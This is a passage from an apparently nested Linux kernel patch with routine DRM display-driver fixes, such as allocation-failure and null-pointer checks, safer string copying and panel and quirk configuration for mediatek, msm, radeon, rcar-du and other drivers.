+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -945,6 +945,8 @@ int mtk_drm_crtc_create(struct drm_device *drm_dev,
+ 
+ 	mtk_crtc->planes = devm_kcalloc(dev, num_comp_planes,
+ 					sizeof(struct drm_plane), GFP_KERNEL);
++	if (!mtk_crtc->planes)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < mtk_crtc->ddp_comp_nr; i++) {
+ 		ret = mtk_drm_crtc_init_comp_planes(drm_dev, mtk_crtc, i,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index 91f58db5915f5..25639fbfd374a 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -514,6 +514,7 @@ static int mtk_drm_bind(struct device *dev)
+ err_deinit:
+ 	mtk_drm_kms_deinit(drm);
+ err_free:
++	private->drm = NULL;
+ 	drm_dev_put(drm);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 47e96b0289f98..6c204ccfb9ece 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -164,8 +164,6 @@ static int mtk_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 
+ 	ret = dma_mmap_attrs(priv->dma_dev, vma, mtk_gem->cookie,
+ 			     mtk_gem->dma_addr, obj->size, mtk_gem->dma_attrs);
+-	if (ret)
+-		drm_gem_vm_close(vma);
+ 
+ 	return ret;
+ }
+@@ -262,6 +260,6 @@ void mtk_drm_gem_prime_vunmap(struct drm_gem_object *obj,
+ 		return;
+ 
+ 	vunmap(vaddr);
+-	mtk_gem->kvaddr = 0;
++	mtk_gem->kvaddr = NULL;
+ 	kfree(mtk_gem->pages);
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3b7d13028fb6b..9e1363c9fcdb4 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -721,7 +721,7 @@ static void mtk_dsi_lane_ready(struct mtk_dsi *dsi)
+ 		mtk_dsi_clk_ulp_mode_leave(dsi);
+ 		mtk_dsi_lane0_ulp_mode_leave(dsi);
+ 		mtk_dsi_clk_hs_mode(dsi, 0);
+-		msleep(20);
++		usleep_range(1000, 3000);
+ 		/* The reaction time after pulling up the mipi signal for dsi_rx */
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 2e7531d2a5d6e..dfd4eec217859 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -1082,13 +1082,13 @@ int adreno_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ void adreno_gpu_cleanup(struct adreno_gpu *adreno_gpu)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+-	struct msm_drm_private *priv = gpu->dev->dev_private;
++	struct msm_drm_private *priv = gpu->dev ? gpu->dev->dev_private : NULL;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(adreno_gpu->info->fw); i++)
+ 		release_firmware(adreno_gpu->fw[i]);
+ 
+-	if (pm_runtime_enabled(&priv->gpu_pdev->dev))
++	if (priv && pm_runtime_enabled(&priv->gpu_pdev->dev))
+ 		pm_runtime_disable(&priv->gpu_pdev->dev);
+ 
+ 	msm_gpu_cleanup(&adreno_gpu->base);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 13ce321283ff9..c9d1c412628e9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -968,7 +968,10 @@ static void dpu_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		dpu_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	if (cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ /**
+@@ -1150,6 +1153,8 @@ static int dpu_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool needs_dirtyfb = dpu_crtc_needs_dirtyfb(crtc_state);
+ 
+ 	pstates = kzalloc(sizeof(*pstates) * DPU_STAGE_MAX * 4, GFP_KERNEL);
++	if (!pstates)
++		return -ENOMEM;
+ 
+ 	if (!crtc_state->enable || !crtc_state->active) {
+ 		DRM_DEBUG_ATOMIC("crtc%d -> enable %d, active %d, skip atomic_check\n",
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 27f029fdc6829..365738f40976a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -444,6 +444,8 @@ static const struct dpu_mdp_cfg sc7180_mdp[] = {
+ 		.reg_off = 0x2B4, .bit_off = 8},
+ 	.clk_ctrls[DPU_CLK_CTRL_CURSOR1] = {
+ 		.reg_off = 0x2C4, .bit_off = 8},
++	.clk_ctrls[DPU_CLK_CTRL_WB2] = {
++		.reg_off = 0x3B8, .bit_off = 24},
+ 	},
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+index 5e6e2626151e8..b7901b666612a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+@@ -942,6 +942,11 @@ static void dpu_kms_mdp_snapshot(struct msm_disp_state *disp_state, struct msm_k
+ 	msm_disp_snapshot_add_block(disp_state, cat->mdp[0].len,
+ 			dpu_kms->mmio + cat->mdp[0].base, "top");
+ 
++	/* dump DSC sub-blocks HW regs info */
++	for (i = 0; i < cat->dsc_count; i++)
++		msm_disp_snapshot_add_block(disp_state, cat->dsc[i].len,
++				dpu_kms->mmio + cat->dsc[i].base, "dsc_%d", i);
++
+ 	pm_runtime_put_sync(&dpu_kms->pdev->dev);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 658005f609f4b..3fbda2a1f77fc 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -1124,7 +1124,7 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	struct dpu_plane_state *pstate = to_dpu_plane_state(state);
+ 	struct drm_crtc *crtc = state->crtc;
+ 	struct drm_framebuffer *fb = state->fb;
+-	bool is_rt_pipe, update_qos_remap;
++	bool is_rt_pipe;
+ 	const struct dpu_format *fmt =
+ 		to_dpu_format(msm_framebuffer_format(fb));
+ 	struct dpu_hw_pipe_cfg pipe_cfg;
+@@ -1136,6 +1136,9 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	pstate->pending = true;
+ 
+ 	is_rt_pipe = (dpu_crtc_get_client_type(crtc) != NRT_CLIENT);
++	pstate->needs_qos_remap |= (is_rt_pipe != pdpu->is_rt_pipe);
++	pdpu->is_rt_pipe = is_rt_pipe;
++
+ 	_dpu_plane_set_qos_ctrl(plane, false, DPU_PLANE_QOS_PANIC_CTRL);
+ 
+ 	DPU_DEBUG_PLANE(pdpu, "FB[%u] " DRM_RECT_FP_FMT "->crtc%u " DRM_RECT_FMT
+@@ -1217,14 +1220,8 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 		_dpu_plane_set_ot_limit(plane, crtc, &pipe_cfg);
+ 	}
+ 
+-	update_qos_remap = (is_rt_pipe != pdpu->is_rt_pipe) ||
+-			pstate->needs_qos_remap;
+-
+-	if (update_qos_remap) {
+-		if (is_rt_pipe != pdpu->is_rt_pipe)
+-			pdpu->is_rt_pipe = is_rt_pipe;
+-		else if (pstate->needs_qos_remap)
+-			pstate->needs_qos_remap = false;
++	if (pstate->needs_qos_remap) {
++		pstate->needs_qos_remap = false;
+ 		_dpu_plane_set_qos_remap(plane);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 73b3442e74679..7ada957adbbb8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -660,6 +660,11 @@ int dpu_rm_get_assigned_resources(struct dpu_rm *rm,
+ 				  blks_size, enc_id);
+ 			break;
+ 		}
++		if (!hw_blks[i]) {
++			DPU_ERROR("Allocated resource %d unavailable to assign to enc %d\n",
++				  type, enc_id);
++			break;
++		}
+ 		blks[num_blks++] = hw_blks[i];
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+index 088ec990a2f26..2a5a68366582b 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+@@ -70,6 +70,8 @@ int dpu_writeback_init(struct drm_device *dev, struct drm_encoder *enc,
+ 	int rc = 0;
+ 
+ 	dpu_wb_conn = devm_kzalloc(dev->dev, sizeof(*dpu_wb_conn), GFP_KERNEL);
++	if (!dpu_wb_conn)
++		return -ENOMEM;
+ 
+ 	drm_connector_helper_add(&dpu_wb_conn->base.base, &dpu_wb_conn_helper_funcs);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+index e86421c69bd1f..86036dd4e1e82 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+@@ -1139,7 +1139,10 @@ static void mdp5_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		mdp5_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	if (mdp5_cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ static const struct drm_crtc_funcs mdp5_crtc_no_lm_cursor_funcs = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_cfg.c b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+index 7e97c239ed489..e0bd452a9f1e6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_cfg.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+@@ -209,8 +209,8 @@ static const struct msm_dsi_config sc7280_dsi_cfg = {
+ 	.num_regulators = ARRAY_SIZE(sc7280_dsi_regulators),
+ 	.bus_clk_names = dsi_sc7280_bus_clk_names,
+ 	.num_bus_clks = ARRAY_SIZE(dsi_sc7280_bus_clk_names),
+-	.io_start = { 0xae94000 },
+-	.num_dsi = 1,
++	.io_start = { 0xae94000, 0xae96000 },
++	.num_dsi = 2,
+ };
+ 
+ static const char * const dsi_qcm2290_bus_clk_names[] = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 89aadd3b3202b..f167a45f1fbdd 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1977,6 +1977,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 
+ 	/* setup workqueue */
+ 	msm_host->workqueue = alloc_ordered_workqueue("dsi_drm_work", 0);
++	if (!msm_host->workqueue)
++		return -ENOMEM;
++
+ 	INIT_WORK(&msm_host->err_work, dsi_err_worker);
+ 
+ 	msm_dsi->id = msm_host->id;
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index 8cd5d50639a53..333cedc11f215 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -255,6 +255,10 @@ static struct hdmi *msm_hdmi_init(struct platform_device *pdev)
+ 	devm_pm_runtime_enable(&pdev->dev);
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
++	if (!hdmi->workq) {
++		ret = -ENOMEM;
++		goto fail;
++	}
+ 
+ 	hdmi->i2c = msm_hdmi_i2c_init(hdmi);
+ 	if (IS_ERR(hdmi->i2c)) {
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 681c1b889b31a..5a0ff112634b7 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -494,7 +494,7 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 		if (IS_ERR(priv->event_thread[i].worker)) {
+ 			ret = PTR_ERR(priv->event_thread[i].worker);
+ 			DRM_DEV_ERROR(dev, "failed to create crtc_event kthread\n");
+-			ret = PTR_ERR(priv->event_thread[i].worker);
++			priv->event_thread[i].worker = NULL;
+ 			goto err_msm_uninit;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/msm/msm_fence.c b/drivers/gpu/drm/msm/msm_fence.c
+index a47e5837c528f..56641408ea742 100644
+--- a/drivers/gpu/drm/msm/msm_fence.c
++++ b/drivers/gpu/drm/msm/msm_fence.c
+@@ -22,7 +22,7 @@ msm_fence_context_alloc(struct drm_device *dev, volatile uint32_t *fenceptr,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	fctx->dev = dev;
+-	strncpy(fctx->name, name, sizeof(fctx->name));
++	strscpy(fctx->name, name, sizeof(fctx->name));
+ 	fctx->context = dma_fence_context_alloc(1);
+ 	fctx->index = index++;
+ 	fctx->fenceptr = fenceptr;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 45a3e5cadc7da..7c2cc1262c05d 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -209,6 +209,10 @@ static int submit_lookup_cmds(struct msm_gem_submit *submit,
+ 			goto out;
+ 		}
+ 		submit->cmd[i].relocs = kmalloc(sz, GFP_KERNEL);
++		if (!submit->cmd[i].relocs) {
++			ret = -ENOMEM;
++			goto out;
++		}
+ 		ret = copy_from_user(submit->cmd[i].relocs, userptr, sz);
+ 		if (ret) {
+ 			ret = -EFAULT;
+diff --git a/drivers/gpu/drm/mxsfb/Kconfig b/drivers/gpu/drm/mxsfb/Kconfig
+index 116f8168bda4a..518b533453548 100644
+--- a/drivers/gpu/drm/mxsfb/Kconfig
++++ b/drivers/gpu/drm/mxsfb/Kconfig
+@@ -8,6 +8,7 @@ config DRM_MXSFB
+ 	tristate "i.MX (e)LCDIF LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXS || ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+@@ -24,6 +25,7 @@ config DRM_IMX_LCDIF
+ 	tristate "i.MX LCDIFv3 LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+diff --git a/drivers/gpu/drm/omapdrm/dss/dsi.c b/drivers/gpu/drm/omapdrm/dss/dsi.c
+index a6845856cbce4..4c1084eb01759 100644
+--- a/drivers/gpu/drm/omapdrm/dss/dsi.c
++++ b/drivers/gpu/drm/omapdrm/dss/dsi.c
+@@ -1039,22 +1039,26 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ {
+ 	struct dsi_data *dsi = s->private;
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kmalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats)
++		return -ENOMEM;
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1]);
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1078,10 +1082,10 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1097,7 +1101,7 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
+ 	PIS(ERRSYNCESC1);
+@@ -1122,6 +1126,8 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
+ 
++	kfree(stats);
++
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 4b39d1dd9140e..a163585a2a52b 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -1889,7 +1889,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('C', 'M', 'N', 0x1247, &delay_200_500_e80_d50, "N120ACA-EA1"),
+ 
+ 	EDP_PANEL_ENTRY('I', 'V', 'O', 0x057d, &delay_200_500_e200, "R140NWF5 RH"),
+-	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "M133NW4J-R3"),
++	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "R133NW4K-R0"),
+ 
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x0624, &kingdisplay_kd116n21_30nv_a010.delay, "116N21-30NV-A010"),
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x1120, &delay_200_500_e80_d50, "116N29-30NK-C007"),
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+index 5c621b15e84c2..439ef30735128 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+@@ -692,7 +692,9 @@ static int s6e3ha2_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS;
++	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS |
++		MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++		MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+index e06fd35de814b..9c3e76171759a 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+@@ -446,7 +446,8 @@ static int s6e63j0x03_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_MODE_NO_EOT_PACKET;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO_NO_HFP |
++		MIPI_DSI_MODE_VIDEO_NO_HBP | MIPI_DSI_MODE_VIDEO_NO_HSA;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+index 54213beafaf5e..ebf4c2d39ea88 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+@@ -990,8 +990,6 @@ static int s6e8aa0_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST
+-		| MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP
+-		| MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET
+ 		| MIPI_DSI_MODE_VSYNC_FLUSH | MIPI_DSI_MODE_VIDEO_AUTO_VERT;
+ 
+ 	ret = s6e8aa0_parse_dt(ctx);
+diff --git a/drivers/gpu/drm/radeon/atombios_encoders.c b/drivers/gpu/drm/radeon/atombios_encoders.c
+index c841c273222e7..3e24fa11d4d38 100644
+--- a/drivers/gpu/drm/radeon/atombios_encoders.c
++++ b/drivers/gpu/drm/radeon/atombios_encoders.c
+@@ -2122,11 +2122,12 @@ int radeon_atom_pick_dig_encoder(struct drm_encoder *encoder, int fe_idx)
+ 
+ 	/*
+ 	 * On DCE32 any encoder can drive any block so usually just use crtc id,
+-	 * but Apple thinks different at least on iMac10,1, so there use linkb,
++	 * but Apple thinks different at least on iMac10,1 and iMac11,2, so there use linkb,
+ 	 * otherwise the internal eDP panel will stay dark.
+ 	 */
+ 	if (ASIC_IS_DCE32(rdev)) {
+-		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1"))
++		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1") ||
++		    dmi_match(DMI_PRODUCT_NAME, "iMac11,2"))
+ 			enc_idx = (dig->linkb) ? 1 : 0;
+ 		else
+ 			enc_idx = radeon_crtc->crtc_id;
+diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c
+index a556b6be11374..e1f3ab607e4f4 100644
+--- a/drivers/gpu/drm/radeon/radeon_device.c
++++ b/drivers/gpu/drm/radeon/radeon_device.c
+@@ -1023,6 +1023,7 @@ void radeon_atombios_fini(struct radeon_device *rdev)
+ {
+ 	if (rdev->mode_info.atom_context) {
+ 		kfree(rdev->mode_info.atom_context->scratch);
++		kfree(rdev->mode_info.atom_context->iio);
+ 	}
+ 	kfree(rdev->mode_info.atom_context);
+ 	rdev->mode_info.atom_context = NULL;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index 3619e1ddeb620..b7dd59fe119e6 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/mutex.h>
+ #include <linux/platform_device.h>
+-#include <linux/sys_soc.h>
+ 
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -204,11 +203,6 @@ static void rcar_du_escr_divider(struct clk *clk, unsigned long target,
+ 	}
+ }
+ 
+-static const struct soc_device_attribute rcar_du_r8a7795_es1[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+-	{ /* sentinel */ }
+-};
+-
+ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ {
+ 	const struct drm_display_mode *mode = &rcrtc->crtc.state->adjusted_mode;
+@@ -238,7 +232,7 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * no post-divider when a display PLL is present (as shown by
+ 		 * the workaround breaking HDMI output on M3-W during testing).
+ 		 */
+-		if (soc_device_match(rcar_du_r8a7795_es1)) {
++		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+ 			target *= 2;
+ 			div = 1;
+ 		}
+@@ -251,13 +245,30 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1)
++		if (rcrtc->index == 1) {
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		else
+-			dpllcr |= DPLLCR_PLCS0
++		} else {
++			dpllcr |= DPLLCR_PLCS0_PLL
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
++			/*
++			 * On ES2.x we have a single mux controlled via bit 21,
++			 * which selects between DCLKIN source (bit 21 = 0) and
++			 * a PLL source (bit 21 = 1), where the PLL is always
++			 * PLL1.
++			 *
++			 * On ES1.x we have an additional mux, controlled
++			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
++			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
++			 * so on ES1.x, in addition to setting bit 21, we need
++			 * to set the bit 20.
++			 */
++
++			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
++				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
++		}
++
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index a2776f1d6f2c2..6381578c4db58 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,6 +16,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
++#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -386,6 +387,43 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
++static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
++	.gen = 3,
++	.features = RCAR_DU_FEATURE_CRTC_IRQ
++		  | RCAR_DU_FEATURE_CRTC_CLOCK
++		  | RCAR_DU_FEATURE_VSP1_SOURCE
++		  | RCAR_DU_FEATURE_INTERLACED
++		  | RCAR_DU_FEATURE_TVM_SYNC,
++	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
++		| RCAR_DU_QUIRK_H3_ES1_PLL,
++	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
++	.routes = {
++		/*
++		 * R8A7795 has one RGB output, two HDMI outputs and one
++		 * LVDS output.
++		 */
++		[RCAR_DU_OUTPUT_DPAD0] = {
++			.possible_crtcs = BIT(3),
++			.port = 0,
++		},
++		[RCAR_DU_OUTPUT_HDMI0] = {
++			.possible_crtcs = BIT(1),
++			.port = 1,
++		},
++		[RCAR_DU_OUTPUT_HDMI1] = {
